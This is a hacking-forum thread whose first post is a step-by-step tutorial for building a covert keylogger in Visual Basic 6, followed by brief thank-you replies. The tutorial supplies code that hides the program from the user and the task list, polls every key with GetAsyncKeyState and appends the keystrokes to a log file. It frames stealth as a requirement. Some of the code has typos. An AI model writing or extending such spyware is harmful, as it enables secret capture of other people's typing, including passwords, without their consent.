ALERT!
Click here to register with a few steps and explore all our cool stuff we have to offer!
Home
Upgrade
Credits
Help
Search
Awards
Achievements
 4663

[FULL]How to Create Your Own Keylogger[COMPLETE]

by fxyt - 10-26-2016 - 07:46 PM
#1
In this post I am going to show You How to Make your Own keylogger ,Making A keylogger is not That much tough This tutorial demonstrates how to make your keylogger easily…


Intro: What a Keylogger is made of

Before we start programming, we need to answer a basic question: what is a keylogger? As the name implies (key+logger) – a keylogger is a computer program that logs (records) the keys (keyboard buttons) pressed by a user. This should be simple to understand. Lets say that I am doing something at my computer. A keylogger is also running (working) on this computer. This would mean that the keylogger is “listening” to all the keys I am pressing and it is writing all the keys to a log file of some sort. Also, as one might have guessed already, we don’t want the user to know that their keys are being logged. So this would mean that our keylogger should work relatively stealth and must not, in any case, show its presence to the user. Good, now we know what a keylogger as and we have an idea of its functions, lets move on to the next step.

=========================================
Basic Concepts: What needs to be achieved
=========================================
Ok, now lets plan our program, what should such keyloger do and what it should not. Significant difference to previous section is in the sense that here we shall discuss the LOGIC, the instructions that our program will follow.
Keylogger will:
1 – listen to all the key strokes of the user.
2 – save these keys in a log file.
3 – during logging, does not reveal its presence to the user.
4 – keeps doing its work as long as the used is logged on regardless of users actions.

==========================================
Implementation: Converting logic into code
==========================================
We shall use Visual Basic because it is much easier and simple to understand comparing to C++ or Java as far as novice audience is concerned. Although programmers consider it somewhat lame to code in VB but truthfully speaking, its the natural language for writing hacking/cracking programs. Lets cut to the chase – start your VB6 environment and we are ready to jump the ride!

We need a main form, which will act as HQ to the program.

First of all, as our program shall run, we need to make sure it is hidden. This should be very simple to accomplish:
Code:
[align=center][/align]
[align=center]Private Sub Form_Load()[/align]
[align=center]Me.Visisble = False[/align]
[align=center]End Sub[/align]
This makes our program invisible to the human eye. To make it invisible to computers eye too, we need to add this line in the Form_Load() event App.TaskVisible = False . This enabled our logger to run in stealth mode and the regular Task Manager will not see our application. Although it will still be possible to see it in the processes tab, there are “ways” to make it hidden. Figure them out yourself, they have nothing to do with programming.

OK, now that our program has run in stealth mode, it should do its essential logging task. For this, we shall be using a whole load of API. These are the interfaces that the Application Platform (windows) itself provides us in those annoying dll files.

There are 3 methods to listen for keys:
* GetAsyncKeyState
* GetKeyboardState
* Windows Hooks

Althought the last method is easier to use, this will not work on Windows98 and also it is NOT very precise. Many people use it, but as my experiences revealed, Keyboard Hooks are only a good way of blocking keys and nothing else. The most exact and precise method in my experience is GetAsyncKeyState().
So lets use this function, but where is that damn thing and how to use it?

Private Declare Function GetAsyncKeyState Lib “USER32″ (ByVal vKey As Long) As Integer
This is how we use a function already present in a dll file. In this case we are using the user32.dll and the function we are using is GetAsyncKeyState(). The arguments (Long vKey), and return value (Long) shall be discussed later, right now its enough to know that this function can listen to keystrokes.

What we need next is to run this function infinitely (as long as the system is running). To do this, just put a Timer control on the form and name it tmrTimer. This timer is used to run the same line of code forever. Note that a while loop with a universally true condition would also accomplish same, but the while loop will certainly hang the system and will lead to its crash as opposed to timer. Timer will not hang the system at all because a while loop tends to carry out the instruction infinitely WITHOUT any break and it also keeps the control to itself, meaning that we cannot do any other job as the loop is running (and with a universally true statement, the while loop will not let the control pass to ANYWHERE else in the program making all the code useless) while the Timer control just carries out the instuction after a set amount of time.

So the two possibilities are:

Code:
[align=center][/align]
[align=center]Do While 1=1[/align]
[align=center]‘our use of the GAKS (GetAsyncKeyState) function Loop[/align]
[align=center][/align]
and

Code:
[align=center][/align]
[align=center]Private Sub tmrTimer_Timer()[/align]
[align=center]‘our use of the GAKS function[/align]
[align=center]End Sub[/align]
[align=center][/align]
Timer being set, lets move on to see how the GAKS function works and how are we going to use it. Basically what the GAKS function does is that it tells us if a specific key is being pressed or not. We can use the GAKS function like this: Hey GAKS() check if the ‘A’ key is being pressed. And the GAKS function will tell us if it is being pressed or not. Sadly, we can’t communicate with processors like this, we have to use some flamboyant 007 style 

Code:
[align=center][/align]
[align=center]If GAKS(65)<>0 Then[/align]
[align=center]Msgbox “The ‘A’ key is being pressed”[/align]
[align=center]Else[/align]
[align=center]Msgbox “The ‘A’ key is not being pressed”[/align]
[align=center]End If[/align]
Now lets see how this code works: GAKS uses ASCII key codes and 65 is the ASCII code for ‘A’ If the ‘A’ key is being pressed then GAKS will return a non-zero value (often 1) and if the key is not being pressed then it will return 0. Hence If GAKS(65)<>0 will be comprehended by the VB compiler as “If the ‘A’ key is being pressed”.

Sticking all this stuff together, we can use this code to write a basic functional keylogger:

Code:
[align=center][/align]
[align=center]Private Sub tmrTimer_Timer()[/align]
[align=center]Dim i As Integer[/align]
[align=center]Static data As String[/align]
[align=center]For i = 65 to 90 ‘represents ASCII codes from ‘A’ to ‘Z’[/align]
[align=center]If GAKS(i)<>0 Then data = data & Chr(i)[/align]
[align=center]Next i[/align]
[align=center]If GAKS(32) <> 0 Then data = data & ” ” ‘checking for the space bar[/align]
[align=center]If Len(data)>=100 Then[/align]
[align=center]Msgbox “The last 100 (or a couple more) are these ” & VBNewLine & data[/align]
[align=center]data = “”[/align]
[align=center]End If[/align]
[align=center]End Sub[/align]
[align=center][/align]
This alone is enough to create a basic functioning keylogger although it is far from practical use. But this does the very essential function of keylogger. Do try it and modify it to your needs to see how GAKS works and how do the Timer delays affect the functionality of a keylogger. Honestly speaking, the core of our keylogger is complete, we have only to sharpen it now and make it precise, accurate and comprehensive.
The first problem that one encounters using GAKS is that this function is far too sensitive than required. Meaning that if we keep a key pressed for 1/10th of a second, this function will tell us that the key has been pressed for at least 2 times, while it actually was a sigle letter. For this, we must sharpen it. We need to add what I call “essential time count” to this function. This means that we need to tell it to generate a double key press only if the key has been pressed for a specified amount of time. For this, we need a whole array of counters. So open your eyes and listen attentively.

Dim count(0 to 255) As Integer
This array is required for remembering the time count for the keys. i.e. to remember for how long the key has been pressed.

Code:
[align=center][/align]
[align=center]Private Sub tmrTimer_Timer()[/align]
[align=center]Dim i As Integer[/align]
[align=center]Const timelimit As Integer = 10[/align]
[align=center]Static data As String[/align]
[align=center]For i=0 To 255 ‘for all the ASCII codes[/align]
[align=center]If GAKS(i)<>0 Then[/align]
[align=center]If count(i) = 0 Then ‘if the key has just been pressed[/align]
[align=center]data = data & Chr(i)[/align]
[align=center]ElseIf count(i) < timelimit Then[/align]
[align=center]count(i) = count(i) + 1 ‘add 1 to the key count[/align]
[align=center]Else[/align]
[align=center]count(i) = 0 ‘initialize the count[/align]
[align=center]data = data & Chr(i)[/align]
[align=center]End If[/align]
[align=center]Else ‘if the key is not being pressed[/align]
[align=center]count(i) = 0[/align]
[align=center]End If[/align]
[align=center]Next i[/align]
[align=center]End Sub[/align]
[align=center][/align]
What we have done here is that we have set a time limit before the GAKS function will tell us that the key is being pressed. This means, in simple words, that if we press and hold the ‘A’ key, the GAKS function will not blindly tell us the ‘A’ key is being pressed, but it will wait for sometime before telling us again that the key is being pressed. This is a very important thing to do, because many users are not very fast typists and tend to press a key for somewhat longer than required.

Now what is left (of the basic keylogger implementation) is just that we write the keys to a file. This should be very simple:

Code:
[align=center][/align]
[align=center]Private Sub timrTimer_Timer()[/align]
[align=center]‘do all the fuss and listen for keystrokes[/align]
[align=center]‘if a key press is detected[/align]
[align=center]Open App.Path & “\logfile.txt” For Append As #1[/align]
[align=center]Print #1, Chr(keycode);[/align]
[align=center]Close #1[/align]
[align=center]End Sub[/align]
Making Tutorials Since Day One
Forgetting to comment what you want to see will end up with me blowing my mind up :D 
Reply
#2
This is a very detailed tutorial! Thank you for sharing this, I was wondering how to make one. ^^
Are you a guest to this site? Click the image below and sign up today!
[Image: FTYbRmR.gif]
Reply
#3
Very basic keylogger. Thanks for the contribute. This will be handy some day. :)
Reply
#4
Thanks for sharing this.
Reply
#5
Seems like a great tutorial. But you can definitely achieve more functions when coding in C++
This account is currently banned
Ban reason: Link Phishing
Reply

Users browsing: 1 Guest(s)